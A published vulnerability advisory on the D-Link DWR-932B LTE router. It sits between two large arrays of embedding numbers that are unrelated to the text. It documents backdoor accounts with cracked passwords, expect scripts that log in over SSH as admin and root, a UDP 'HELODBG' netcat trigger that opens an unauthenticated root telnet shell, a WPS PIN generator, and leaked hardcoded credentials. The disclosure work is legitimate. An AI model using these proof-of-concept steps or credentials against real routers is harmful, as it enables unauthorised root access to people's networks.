0.008797015994787216, -0.08487129211425781, 0.04644487053155899, 0.04042390361428261, 0.1013190969824791, -0.04461660981178284, 0.0009197390172630548, 0.02989904023706913, -0.10237648338079453, 0.014957896433770657, 0.0018754148622974753, -0.04735386371612549, 0.016966119408607483, -0.012793083675205708, -0.0011080146068707108, 0.1015746220946312, 0.016381509602069855, -0.056320205330848694, -0.07532237470149994, -0.10904836654663086, -0.0563524067401886, -0.07569974660873413, 0.028618816286325455, -0.050331924110651016, 0.08692417293787003, -0.049475762993097305, -0.052229367196559906, -0.12138140946626663, -0.04014262184500694, 0.01776788756251335, -0.04987169802188873, 0.010401475243270397, -0.018294615671038628, 0.06859380751848221, -0.004639172460883856, -0.03503412753343582, -0.03019578382372856, 0.057026736438274384, 0.06158127263188362, 0.019707633182406425, -0.0191251952201128, 0.028751390054821968, 0.040504079312086105, -0.026354921981692314, -0.03605489432811737, -0.028890661895275116, 0.040010254830121994, -0.1241505965590477, 0.012174200266599655, -0.009539955295622349, -0.017198553308844566, -0.011728081852197647, 0.0031577416229993105, -0.04732266440987587, -0.0291607528924942, -0.06861724704504013, -0.07070539146661758, -0.03486711531877518, 0.02963995933532715, 0.03755621612071991, -0.03509865328669548, -0.06448492407798767, -0.029453178867697716, 0.0005081385024823248, -0.007635021582245827, 0.05780026689171791, 0.030162673443555832, -0.02541661076247692, -0.15142813324928284, 0.036621056497097015, -0.03148183226585388, 0.042628638446331024, -0.001374443294480443, 0.008035718463361263, -0.09035518020391464, 0.02319996803998947, -0.052028968930244446, -0.05248085781931877, -4.7138425493927625e-33, 0.009317275136709213, -0.0035326227080076933, -0.034975308924913406, -0.028456315398216248, -0.013165305368602276, 0.05633622780442238, -0.016522033140063286, 0.06291767954826355, 0.03352028504014015, -0.12085375934839249, 0.014268250204622746, 0.029012959450483322, 0.027339914813637733, -0.06567337363958359, 0.056242458522319794, -0.02807530015707016, -0.05970003455877304, 0.006374389864504337, 0.01290960144251585, 0.04311614856123924, 0.10831126570701599, -0.02055761031806469, -0.018248405307531357, 0.03043789602816105, 0.027445601299405098, 0.04067181423306465, 0.0706927701830864, 0.10905347019433975, -0.03755156323313713, 0.004794476553797722, -0.06347215175628662, -0.040139492601156235, 0.03783119469881058, 0.06897874176502228, 0.015331367030739784, -0.011621765792369843, -0.014234708622097969, 0.029826998710632324, -0.053257282823324203, 0.06803259998559952, 0.05413755774497986, -0.05430910736322403, 0.012068524956703186, -0.005026441533118486, -0.09947587549686432, -0.07214771211147308, 0.04418819397687912, -0.01821773126721382, 0.06240214407444, 0.04818838834762573, -0.0028192419558763504, -0.040407419204711914, -0.008127114735543728, 0.05609048902988434, -0.024446208029985428, 0.011101573705673218, -0.029788199812173843, 0.02499031461775303, 0.08312295377254486, 0.020192231982946396, -0.017133839428424835, -0.04010216146707535, 0.008508984930813313, -0.029394982382655144, -0.05279426649212837, -0.004144345410168171, -0.034140512347221375, 0.04764549061655998, -0.06904132664203644, 0.013164028525352478, -0.012899842113256454, -0.001672042766585946, 0.03115280531346798, 0.04960830137133598, -0.0003141191555187106, -0.05629580095410347, -0.06352241337299347, -0.039076436311006546, 0.0376560315489769, 0.03367636725306511, -0.06145862862467766, -0.013926666229963303, 0.0053762891329824924, 0.025918301194906235, 0.04099153354763985, 0.07016625255346298, 0.044128939509391785, 0.024124106392264366, 0.09280935674905777, -0.058771196752786636, 0.05819817632436752, -0.002210483653470874, 0.013287064619362354, -0.07422969490289688, 0.058093197643756866, -5.729511443064439e-8, -0.005186558701097965, 0.04217975214123726, -0.034388527274131775, 0.047581747174263, -0.0009535771678201854, -0.0614890530705452, -0.028527339920401573, -0.03070027008652687, -0.025422928854823112, 0.14882978796958923, 0.00017888426373247057, 0.07994444668292999, 0.10010679066181183, -0.1314271092414856, 0.07854018360376358, 0.04211794212460518, -0.02184244990348816, -0.06751595437526703, -0.04404253512620926, -0.018514446914196014, -0.032484788447618484, 0.040537308901548386, 0.0625663474202156, 0.06629399210214615, -0.0006649415590800345, -0.04417148604989052, -0.029330985620617867, 0.029405057430267334, -0.013312628492712975, 0.05582813918590546, -0.001967471791431308, 0.07725618034601212, -0.03138940781354904, -0.0382223054766655, -0.03599419444799423, -0.015682334080338478, -0.000852934317663312, 0.0785902664065361, 0.00523465545848012, 0.06721439212560654, 0.03814421966671944, 0.00013673560169991106, -0.013690261170268059, 0.015353284776210785, 0.029489442706108093, -0.03856445103883743, 0.08355817943811417, -0.053816623985767365, 0.05418406426906586, -0.01966935209929943, 0.009081242606043816, 0.02977006696164608, 0.015199929475784302, 0.06947807967662811, -0.018802179023623466, -0.006848933640867472, -0.10278701782226562, 0.07002811878919601, -0.028444482013583183, 0.040205735713243484, 0.03878225386142731, -0.08766964077949524, 0.07083849608898163, 0.007301241625100374 ]
Product Description Dlink is a multinational networking equipment manufacturing corporation. Vulnerabilities Summary The Dlink DWR-932B is a LTE router / access point overall badly designed with a lot of vulnerabilities. It's available in a number of countries to provide Internet with a LTE network. It's a model based on the (in)famous Quanta LTE router models and inherits some vulnerabilities. The tests below are done using the latest available firmware (firmware DWR-932_fw_revB_2_02_eu_en_20150709.zip, model revision B, /Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc). The summary of the vulnerabilities is: A personal point of view: at best, the vulnerabilites are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor. Not all the vulnerabilities found have been disclosed in this advisory. Only the significant ones are shown. This router is still on sale. Due to lack of security patches provided by the vendor, the vulnerabilities will remain unpatched and customers with questions should contact their local/regional D-Link support office for the latest information. Details - Backdoor accounts By default, telnetd and SSHd are running in the router. Telnetd is running even if there is no documentation about it: user@kali:~$ cat ./etc/init.d/start_appmgr [...] #Sandro { for telnetd debug... start-stop-daemon -S -b -a /bin/logmaster #if [ -e /config2/telnetd ]; then start-stop-daemon -S -b -a /sbin/telnetd #fi #Sandro } [...] 2 backdoor accounts exist and can be used to bypass the HTTP authentication used to manage the router. admin@homerouter:~$ grep admin /etc/passwd admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh admin@homerouter:~$ The password for admin is 'admin' and can be found in the /bin/appmgr program using IDA: About the root user: user@kali:~$ cat ./etc/shadow root:aRDiHrJ0OkehM:16270:0:99999:7::: daemon:*:16270:0:99999:7::: bin:*:16270:0:99999:7::: sys:*:16270:0:99999:7::: sync:*:16270:0:99999:7::: games:*:16270:0:99999:7::: man:*:16270:0:99999:7::: lp:*:16270:0:99999:7::: mail:*:16270:0:99999:7::: news:*:16270:0:99999:7::: uucp:*:16270:0:99999:7::: proxy:*:16270:0:99999:7::: www-data:*:16270:0:99999:7::: backup:*:16270:0:99999:7::: list:*:16270:0:99999:7::: irc:*:16270:0:99999:7::: gnats:*:16270:0:99999:7::: diag:*:16270:0:99999:7::: nobody:*:16270:0:99999:7::: messagebus:!:16270:0:99999:7::: avahi:!:16270:0:99999:7::: admin@kali:~$ Using john to crack the hashes: user@kali:~$ john -show shadow+passwd admin:admin:admin:/:/bin/sh root:1234:16270:0:99999:7::: 2 password hashes cracked, 0 left user@kali:~$ Results: admin has password admin root has password 1234 Working exploit for admin: user@kali:~$ cat quanta-ssh-default-password-admin #!/usr/bin/expect -f set timeout 3 spawn ssh [email protected] expect "password: $" send "admin\r" interact user@kali:~$ ./quanta-ssh-default-password-admin spawn ssh [email protected] [email protected]'s password: admin@homerouter:~$ id uid=168(admin) gid=168(admin) groups=168(admin) admin@homerouter:~$ Alternatively, you can fetch it at https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin. Working exploit for root: user@kali:~$ cat quanta-ssh-default-password-root #!/usr/bin/expect -f set timeout 3 spawn ssh [email protected] expect "password: $" send "1234\r" interact user@kali:~$ ./quanta-ssh-default-password-root spawn ssh [email protected] [email protected]'s password: root@homerouter:~# id uid=168(root) gid=168(root) groups=168(root) root@homerouter:~# Alternatively, you can fetch it at https://pierrekim.github.io/advisories/quanta-ssh-default-password-root. Details - Backdoor A backdoor is present inside the /bin/appmgr program. By sending a specific string in UDP to the router, an authentication-less telnet server will start if a telnetd daemon is not already running. In /bin/appmgr , a thread listens to 0.0.0.0:39889 (UDP) and waits for commands. If a client sends "HELODBG" to the router, the router will execute /sbin/telnetd -l /bin/sh , allowing to access without authentication to the router as root. When using IDA, we can see the backdoor is located in the main function (line 369): Working PoC : user@kali:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889 Hello ^C user@kali:~$ telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. OpenEmbedded Linux homerouter.cpe msm 20141210 homerouter.cpe / # id uid=0(root) gid=0(root) / # exit Connection closed by foreign host. user@kali:~$ Details - Default WPS PIN Wi-Fi Protected Setup(WPS) is a standard for easy and secure establishment of a wireless home network, as defined in the documentation provided in the router (help.html). By default, the PIN for the WPS system is ever 28296607 . It is, in fact, hardcoded in the /bin/appmgr program: This PIN can be found in the HostAP configuration too, and, using the information leak, in the HTTP APIs of the router: root@homerouter:~# ps -a|grep hostap 1006 root 0:00 hostapd /var/wifi/ar6k0.conf 1219 root 0:00 grep hostap root@homerouter:~# cat /var/wifi/ar6k0.conf [...] ap_pin=28296607 [...] Details - Weak WPS PIN Generation - with a reverse-engineered algorithm An user can use the webinterface to generate a temporary PIN for the WPS system (low probability as the 28296607 WPS PIN is provided by default). The PIN generated by the router is weak as it is generated using this "strange" reverse-engineered algorithm: user@kali:~$ cat quanta-wps-gen.c #include <stdio.h> #include <stdlib.h> #include <time.h> int main ( int argc, char ** argv, char ** envp) { unsigned int i0, i1; int i2; /* the seed is the current time of the router, which uses NTP... */ srand(time( 0 )); i0 = rand() % 10000000 ; if (i0 <= 999999 ) i0 += 1000000 ; i1 = 10 * i0; i2 = ( 10 - (i1 / 10000 % 10 + i1 / 1000000 % 10 + i1 / 100 % 10 + 3 * (i1 / 100000 % 10 + 10 * i0 / 10000000 % 10 + i1 / 1000 % 10 + i1 / 10 % 10 )) % 10 ) % 10 + 10 * i0; printf( "%d " , i2 ); return ( 0 ); } user@kali:~$ gcc -o dlink-wps-gen quanta-wps-gen.c user@kali:~$ ./dlink-wps-gen 97329329 user@kali:~$ You can fetch this program at https://pierrekim.github.io/advisories/quanta-wps-gen.c. Using srand(time(0)) as a seed is a bad idea because an attacker, knowing the current date as time(0) returns the current date in an integer value, can just generate the valid WPS PIN. The Router uses NTP so is likely to have a correct timestamp configured. It's trivial for an attacker to generate valid WPS PIN suites and bruteforce them. For the curious reader, the original algorithm in the firmware is: .text:0001B4D4 EXPORT generate_wlan_wps_enrollee_pin .text:0001B4D4 generate_wlan_wps_enrollee_pin ; CODE XREF: wifi_msg_handle+194p .text:0001B4D4 .text:0001B4D4 var_3C = -0x3C .text:0001B4D4 var_38 = -0x38 .text:0001B4D4 s = -0x34 .text:0001B4D4 var_30 = -0x30 .text:0001B4D4 var_2C = -0x2C .text:0001B4D4 .text:0001B4D4 STMFD SP!, {R4-R11,LR} .text:0001B4D8 SUB SP, SP, #0x1C .text:0001B4DC STR R0, [SP,#0x40+s] .text:0001B4E0 MOV R0, #0 ; timer .text:0001B4E4 BL time .text:0001B4E8 BL srand .text:0001B4EC BL rand .text:0001B4F0 LDR R4, =0x6B5FCA6B .text:0001B4F4 MOV R6, R0,ASR#31 .text:0001B4F8 SMULL R1, R4, R0, R4 .text:0001B4FC RSB R10, R6, R4,ASR#22 .text:0001B500 RSB R12, R10, R10,LSL#5 .text:0001B504 RSB R2, R12, R12,LSL#6 .text:0001B508 ADD R11, R10, R2,LSL#3 .text:0001B50C LDR R8, =0xF423F .text:0001B510 ADD R9, R11, R11,LSL#2 .text:0001B514 SUB R1, R0, R9,LSL#7 .text:0001B518 CMP R1, R8 .text:0001B51C ADDLS R1, R1, #0xF4000 .text:0001B520 ADDLS R1, R1, #0x240 .text:0001B524 ADD R3, R1, R1,LSL#2 .text:0001B528 MOV R3, R3,LSL#1 .text:0001B52C LDR R1, =0xCCCCCCCD .text:0001B530 LDR R5, =0xA7C5AC5 .text:0001B534 LDR R6, =0x6B5FCA6B .text:0001B538 MOV R7, R3,LSR#5 .text:0001B53C UMULL R4, R7, R5, R7 .text:0001B540 UMULL R9, LR, R1, R3 .text:0001B544 UMULL R5, R6, R3, R6 .text:0001B548 LDR R12, =0xD1B71759 .text:0001B54C MOV R6, R6,LSR#22 .text:0001B550 UMULL R10, R12, R3, R12 .text:0001B554 MOV LR, LR,LSR#3 .text:0001B558 UMULL R10, R9, R1, R6 .text:0001B55C UMULL R8, R10, R1, LR .text:0001B560 LDR R0, =0x431BDE83 .text:0001B564 MOV R12, R12,LSR#13 .text:0001B568 UMULL R11, R0, R3, R0 .text:0001B56C STR R10, [SP,#0x40+var_38] .text:0001B570 UMULL R8, R10, R1, R12 .text:0001B574 LDR R2, =0x51EB851F .text:0001B578 LDR R4, =0x10624DD3 .text:0001B57C UMULL R5, R2, R3, R2 .text:0001B580 MOV R0, R0,LSR#18 .text:0001B584 STR R10, [SP,#0x40+var_3C] .text:0001B588 UMULL R8, R4, R3, R4 .text:0001B58C UMULL R8, R10, R1, R0 .text:0001B590 MOV R2, R2,LSR#5 .text:0001B594 MOV R7, R7,LSR#7 .text:0001B598 UMULL R8, R11, R1, R7 .text:0001B59C STR R10, [SP,#0x40+var_30] .text:0001B5A0 MOV R4, R4,LSR#6 .text:0001B5A4 UMULL R8, R10, R1, R2 .text:0001B5A8 UMULL R8, R5, R1, R4 .text:0001B5AC STR R10, [SP,#0x40+var_2C] .text:0001B5B0 MOV R8, R9,LSR#3 .text:0001B5B4 MOV R10, R11,LSR#3 .text:0001B5B8 ADD R11, R10, R10,LSL#2 .text:0001B5BC ADD R9, R8, R8,LSL#2 .text:0001B5C0 MOV R10, R5,LSR#3 .text:0001B5C4 LDR R8, [SP,#0x40+var_38] .text:0001B5C8 SUB R6, R6, R9,LSL#1 .text:0001B5CC SUB R7, R7, R11,LSL#1 .text:0001B5D0 LDR R9, [SP,#0x40+var_3C] .text:0001B5D4 LDR R11, [SP,#0x40+var_30] .text:0001B5D8 ADD R5, R10, R10,LSL#2 .text:0001B5DC SUB R5, R4, R5,LSL#1 .text:0001B5E0 LDR R4, [SP,#0x40+var_2C] .text:0001B5E4 MOV R10, R8,LSR#3 .text:0001B5E8 MOV R8, R9,LSR#3 .text:0001B5EC MOV R9, R11,LSR#3 .text:0001B5F0 ADD R7, R7, R6 .text:0001B5F4 ADD R10, R10, R10,LSL#2 .text:0001B5F8 ADD R9, R9, R9,LSL#2 .text:0001B5FC MOV R11, R4,LSR#3 .text:0001B600 ADD R8, R8, R8,LSL#2 .text:0001B604 ADD R7, R7, R5 .text:0001B608 SUB LR, LR, R10,LSL#1 .text:0001B60C SUB R5, R0, R9,LSL#1 .text:0001B610 SUB R8, R12, R8,LSL#1 .text:0001B614 ADD R11, R11, R11,LSL#2 .text:0001B618 ADD R12, R7, LR .text:0001B61C SUB R4, R2, R11,LSL#1 .text:0001B620 ADD R8, R8, R5 .text:0001B624 ADD R5, R8, R4 .text:0001B628 ADD R0, R12, R12,LSL#1 .text:0001B62C ADD R4, R5, R0 .text:0001B630 UMULL R5, R1, R4, R1 .text:0001B634 MOV R2, R1,LSR#3 .text:0001B638 ADD LR, R2, R2,LSL#2 .text:0001B63C SUB R8, R4, LR,LSL#1 .text:0001B640 LDR R0, =0x66666667 .text:0001B644 RSB R2, R8, #0xA .text:0001B648 SMULL R8, R0, R2, R0 .text:0001B64C MOV R12, R2,ASR#31 .text:0001B650 RSB R1, R12, R0,ASR#2 .text:0001B654 ADD LR, R1, R1,LSL#2 .text:0001B658 LDR R12, =(aHostapd_conf_f - 0x1B670) .text:0001B65C SUB R4, R2, LR,LSL#1 .text:0001B660 LDR R2, =(aGet_wpspinI - 0x1B67C) .text:0001B664 ADD R4, R4, R3 .text:0001B668 ADD R0, PC, R12 ; "hostapd_conf_file_gen" .text:0001B66C ADD R0, R0, #0x3C .text:0001B670 MOV R1, #0x3B .text:0001B674 ADD R2, PC, R2 ; "Get_WpsPin:%in" .text:0001B678 MOV R3, R4 .text:0001B67C BL wifi_filelog .text:0001B680 LDR R1, =(a08lu - 0x1B690) .text:0001B684 LDR R0, [SP,#0x40+s] ; s .text:0001B688 ADD R1, PC, R1 ; "%08lu" .text:0001B68C MOV R2, R4 .text:0001B690 ADD SP, SP, #0x1C .text:0001B694 LDMFD SP!, {R4-R11,LR} .text:0001B698 B sprintf .text:0001B698 ; End of function generate_wlan_wps_enrollee_pin Details - Leaking No-IP account (?): The file /etc/inadyn-mt.conf (for a dyndns client) contains an user and a hardcoded password: --log_file /usr/inadyn_srv.log --forced_update_period 6000 --username alex_hung --password 641021 --dyndns_system [email protected] --alias test.no-ip.com Details - Multiple vulnerabilities in the HTTP daemon (qmiweb) The HTTP daemon /bin/qmiweb is full of vulnerabilities. You can see my precedent researches about a router model using a similar firmware: Adapting the exploits is left as exercises for the reader :) Details - Remote FOTA (Firmware Over The Air) The credentials to contact the FOTA server are hardcoded in the /sbin/fotad binary, as shown with this IDA screenshot: The function sub_CAAC contains the credentials as base64-strings, used to retrieve the firmware. It's notable the FOTA daemon tries to retrieve the firmware over HTTPS. But at the date of the writing, the SSL certificate for https://qdp:[email protected]/qdh/ispname/2031/appliance.xml is invalid for 1.5 year. The user/password combinations are: qdpc:qdpc qdpe:qdpe qdp:qdp Details - Bad security practices: From /etc/init.d/start_appmgr , you will read "strange" shell commands executed as root, like: if [ -f /sbin/netcfg ]; then echo -n "chmod 777 netcfg" chmod 777 /sbin/netcfg fi if [ -f /bin/QNetCfg ]; then echo -n "chmod 777 QNetCfg" chmod 777 /bin/QNetCfg fi I have no idea why the vendor needs to chmod 777 files located in /bin/. Details - Security removed in UPnP UPnP allows to add firewall rules dynamically. Because of the security risks involved, generally there are restrictions in place to avoid dangerous new firewall rules from an unstrusted LAN client. Insecurity in IPnP was hype 10 years ago (in 2006). The security level of the UPNP program (miniupnp) in this router is volountarily lowered as shown below and allows an attacker located in the LAN area to add Port forwarding from the Internet to other clients located in the LAN: The /var/miniupnpd.conf is generated by the /bin/appmgr program: It will generate the /var/miniupnpd.conf file: ext_ifname=rmnet0 listening_ip=bridge0 port=2869 enable_natpmp=yes enable_upnp=yes bitrate_up=14000000 bitrate_down=14000000 secure_mode=no # "secure" mode : when enabled, UPnP client are allowed to add mappings only to their IP. presentation_url=http://192.168.1.1 system_uptime=yes notify_interval=30 upnp_forward_chain=MINIUPNPD upnp_nat_chain=MINIUPNPD There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024: Normal config file: # UPnP permission rules # (allow|deny) (external port range) ip/mask (internal port range) # A port range is <min port>-<max port> or <port> if there is only # one port in the range. # ip/mask format must be nn.nn.nn.nn/nn # it is advised to only allow redirection of port above 1024 # and to finish the rule set with "deny 0-65535 0.0.0.0/0 0-65535" allow 1024-65535 192.168.0.0/24 1024-65535 deny 0-65535 0.0.0.0/0 0-65535 In the configuration of the vulnerable router where there are no permission rules, an attacker can forward everything from the WAN into the LAN. For example, an attacker can add a forwarding rule in order to allow traffic from the Internet to local Exchange servers, mail servers, ftp servers, http servers, database servers... In fact, this lack of security allows a local user to forward whatever they want from the Internet into the LAN. Personal notes As the router has a sizable memory (168 MB), a decent CPU and good free space (235 MB) with complete toolkits installed by default (sshd, proxy ( /bin/tinyproxy -c /var/tproxy.conf ), tcpdump ...), I advise users to trash their routers because it's trivial for an attacker to use this router as an attack vector (ie: hosting a sniffing tool, LAN hacking, active MiTM tool, spamming zombie). From my tests, it is possible to overwrite the firmware with a custom (backdoored) firmware. Generating a valid backdoored firmware is left as an exercise for the reader, but with all these vulnerabilities present in the default firmware, I don't think it is worth making the effort. Vendor Response Customers with questions should contact their local/regional D-Link support offices for the latest information. Report Timeline Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers. Apr 04, 2016: A public advisory about Quanta routers is sent to security mailing lists. Jun 09, 2016: Pierre Kim is contacted by Gianni Carabelli about Dlink DWR-932 router's similarities to Quanta routers. Jun 14, 2016: Pierre Kim thanks Gianni Carabelli and says he will contact Dlink. Jun 15, 2016: Dlink is contacted about vulnerabilities in the DWR-932 router (=~ 20 vulns). Jun 16, 2016: Dlink Security Incident Response Team (William Brown) acknowledges the receipt of the report and says they will provide further updates. Jul 09, 2016: Pierre asks for updates. Jul 09, 2016: Dlink says they will have correction by July 15. Jul 19, 2016: Pierre asks for updates. Aug 19, 2016: Pierre asks for updates. Sep 12, 2016: Pierre asks for updates and says he will soon release an advisory as 90 days have passed without news. Sep 12, 2016: [email protected] is contacted to get pieces of advice about the disclosure. Sep 13, 2016: CERT recommends to try to contact D-link and to publish the advisory. Sep 13, 2016: Dlinks says they don't have a schedule for a firmware release. Customers who have questions should contact their local/regional D-Link support offices for the latest information. support.dlink.com will be updated in the next 24 hours. Sep 28, 2016: A public advisory is sent to security mailing lists. Credits These vulnerabilities were found by Pierre Kim (@PierreKimSec). I would like to thank Gianni Carabelli who found this router and thought it was very similar to the previous backdoored Quanta routers. References https://pierrekim.github.io/advisories/2016-dlink-0x00.txt https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html https://www.linkedin.com/pulse/rooting-dlink-dwr-923-4g-router-gianni-carabelli Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
[ -0.10264904052019119, -0.018649812787771225, 0.07064662873744965, -0.028351038694381714, 0.015042990446090698, -0.042446624487638474, -0.053791992366313934, 0.0977872833609581, -0.06382755935192108, 0.012161144986748695, 0.0004240735142957419, 0.026925556361675262, -0.06957433372735977, 0.03369002044200897, -0.0040892185643315315, 0.06392783671617508, -0.016162307932972908, -0.14019493758678436, -0.014149590395390987, -0.02510249987244606, 0.0574406236410141, 0.09037841111421585, -0.031124567613005638, 0.011567695997655392, 0.054171133786439896, -0.10497280210256577, 0.04597945511341095, 0.06680186092853546, 0.004835553467273712, -0.07862932235002518, 0.014187504537403584, 0.039213892072439194, -0.1456347554922104, -0.05595463141798973, 0.05716663599014282, -0.013640334829688072, -0.008242974057793617, -0.05627019330859184, 0.01677783951163292, -0.01976177841424942, 0.04507558047771454, -0.02308562584221363, -0.01917886920273304, 0.07215787470340729, -0.010759017430245876, 0.008590949699282646, 0.0033946034964174032, 0.014849129132926464, -0.07214435935020447, -0.023469630628824234, 0.029177583754062653, -0.014043652452528477, 0.0400971956551075, 0.025325682014226913, 0.06218560039997101, -0.06525561213493347, -0.04532643035054207, 0.05055417865514755, 0.014439845457673073, 0.04200287535786629, 0.03294225037097931, 0.0717320665717125, 0.007271246053278446, -0.027959104627370834, 0.023549016565084457, 0.0033394715283066034, 0.08367473632097244, -0.00343732675537467, 0.007786808535456657, -0.1369115114212036, -0.07908987998962402, 0.01198067981749773, -0.006778598763048649, 0.07845287024974823, 0.060197871178388596, 0.028642263263463974, 0.009090786799788475, -0.001993446610867977, 0.043432317674160004, -0.06710058450698853, 0.04574105888605118, 0.03565429896116257, 0.03919067233800888, -0.008952347561717033, 0.0567995123565197, -0.013138613663613796, -0.012825589627027512, 0.009301790036261082, 0.04933767765760422, -0.04018141329288483, 0.01584962010383606, 0.05606379732489586, -0.0298449844121933, 0.1063866838812828, 0.028028858825564384, 0.007882392033934593, 0.04525225982069969, 0.01826075278222561, -0.0921700969338417, 0.07610318809747696, -0.018784550949931145, 0.005554972216486931, -0.05541956052184105, 0.02771892584860325, -0.04052300006151199, -0.054248787462711334, 0.05815834179520607, 0.04307596758008003, 0.046078577637672424, -0.07305408269166946, -0.01571359485387802, 0.012089875526726246, -0.04879167303442955, -0.02162208966910839, -0.06503301113843918, -0.08031108230352402, -0.045404743403196335, 0.030703414231538773, -0.030335482209920883, -0.08531823754310608, -0.023637128993868828, 0.021300675347447395, 0.032371826469898224, 0.0008369653369300067, -0.10678116232156754, -0.03745362535119057, 0.006650900933891535, 5.4298313830328176e-33, 0.02590830810368061, 0.04816071316599846, -0.09503211826086044, -0.026343055069446564, 0.023127181455492973, -0.021808896213769913, -0.006160031538456678, 0.05064927041530609, -0.0532766655087471, 0.004335222765803337, -0.14794416725635529, -0.09439628571271896, -0.04185888171195984, 0.01701332814991474, 0.07005341351032257, -0.04381228983402252, -0.03759617730975151, 0.03141627833247185, -0.009010758250951767, 0.06960898637771606, 0.11260772496461868, -0.05355176329612732, -0.02566789835691452, -0.05051657557487488, 0.0352681428194046, 0.026093026623129845, 0.038726698607206345, 0.021457282826304436, 0.05430154874920845, 0.005636087153106928, -0.0925375372171402, 0.00642744917422533, 0.00680081220343709, -0.02069336362183094, 0.035240259021520615, -0.05236125364899635, -0.12355460971593857, -0.04476882144808769, -0.08427710086107254, -0.016865625977516174, 0.02515285648405552, -0.0027944277971982956, -0.04481422156095505, -0.041254572570323944, 0.06988850235939026, -0.055529698729515076, -0.005657189060002565, -0.04757128283381462, -0.07382948696613312, 0.021652527153491974, -0.06044911965727806, 0.01310878898948431, -0.043098997324705124, 0.00012559184688143432, 0.013409868814051151, 0.046070437878370285, -0.0033614560961723328, -0.014944447204470634, 0.04191106557846069, 0.08621601015329361, 0.05062267184257507, 0.04540519788861275, -0.030414849519729614, -0.0467090979218483, -0.01941019669175148, 0.010647964663803577, 0.04341045767068863, -0.07020963728427887, 0.027765745297074318, 0.05739092081785202, -0.004926629830151796, -0.03883499652147293, 0.11708477884531021, 0.019323794171214104, -0.009850788861513138, -0.05222746357321739, -0.04333605244755745, 0.03873087838292122, 0.024175237864255905, -0.09503775089979172, -0.06672809273004532, -0.022899344563484192, 0.06270727515220642, 0.023684661835432053, 0.04806171730160713, -0.02736988291144371, 0.019197028130292892, -0.08952216058969498, -0.05629992112517357, 0.079402856528759, 0.023676998913288116, 0.011338227428495884, -0.011492935940623283, 0.0049778763204813, 0.008411332033574581, -5.3375484643375447e-33, -0.015567694790661335, 0.04620411992073059, 0.0178378876298666, -0.08028710633516312, -0.049984391778707504, -0.05227057635784149, -0.00023604519083164632, 0.039832472801208496, 0.06801053881645203, 0.007030712440609932, 0.04946726933121681, -0.010461801663041115, 0.013200941495597363, -0.05123920738697052, 0.0647030919790268, -0.045999009162187576, 0.03259050473570824, -0.10577880591154099, 0.0011504068970680237, 0.04044181853532791, 0.05710776150226593, 0.02182018756866455, -0.004590017721056938, -0.06360643357038498, 0.006242092698812485, 0.008366859517991543, 0.03660711646080017, 0.044593002647161484, 0.015192167833447456, 0.031672365963459015, 0.006005285773426294, 0.05941016972064972, -0.015457230620086193, 0.028559433296322823, 0.029803378507494926, 0.06442451477050781, 0.05691584572196007, -0.0273998212069273, 0.05111711472272873, -0.03424661234021187, 0.13145099580287933, 0.06006507948040962, -0.009541425853967667, 0.0007619450916536152, 0.010128552094101906, 0.008665143512189388, -0.044018350541591644, -0.07677559554576874, -0.04485747218132019, -0.008132909424602985, 0.09976940602064133, 0.0034912368282675743, 0.04812364652752876, 0.03429044783115387, -0.008943387307226658, 0.031531430780887604, 0.012447334825992584, -0.03212731331586838, -0.023897938430309296, 0.05084871128201485, 0.09517265856266022, -0.008209623396396637, -0.03187458962202072, 0.11252489686012268, 0.0166988093405962, -0.05427145957946777, -0.030664248391985893, -0.03359842300415039, 0.05751362815499306, 0.018607888370752335, 0.03277044743299484, -0.051262468099594116, -0.0032475937623530626, -0.016969338059425354, 0.0038485811091959476, -0.08658992499113083, -0.08561555296182632, 0.017271779477596283, -0.02814638800919056, -0.01942630484700203, -0.03724827244877815, 0.00020790145208593458, 0.007782704662531614, 0.0051466538570821285, 0.012779312208294868, -0.09258764237165451, 0.06739042699337006, 0.07679981738328934, 0.05352130904793739, 0.0023194984532892704, -0.0651974156498909, -0.03027079813182354, -0.08645210415124893, 0.16017408668994904, 0.0063191307708621025, -6.06288779181341e-8, 0.02439866214990616, -0.022505609318614006, -0.05856875330209732, -0.02142968773841858, 0.004132306203246117, -0.03466908261179924, -0.002143777906894684, 0.05002095177769661, -0.007967934012413025, 0.07233484834432602, 0.047576501965522766, 0.029561854898929596, -0.17184624075889587, 0.03660406544804573, 0.008793197572231293, 0.07154805958271027, -0.12239300459623337, 0.02364787459373474, -0.0404205285012722, -0.02487834170460701, 0.02753293700516224, -0.008376753889024258, 0.022170621901750565, 0.016429351642727852, -0.021741226315498352, -0.010658579878509045, 0.03837667033076286, 0.060864340513944626, 0.03645104169845581, 0.0036999403964728117, -0.03953774645924568, 0.06605897098779678, -0.005149573087692261, 0.007388346362859011, -0.06200407072901726, 0.103016696870327, -0.013921179808676243, 0.036206286400556564, 0.03830886259675026, 0.12378298491239548, 0.016224227845668793, 0.03559385985136032, 0.028296679258346558, 0.043097227811813354, 0.08021076768636703, -0.05342912673950195, -0.099754199385643, 0.05041965842247009, 0.03915225714445114, -0.040711186826229095, 0.013307242654263973, 0.02719566598534584, -0.036368098109960556, -0.011511345393955708, -0.06756776571273804, 0.008983512409031391, -0.041849274188280106, -0.04355618357658386, -0.0440240241587162, 0.006500480696558952, 0.04743920639157295, -0.05214985832571983, 0.09350847452878952, 0.021120283752679825 ]
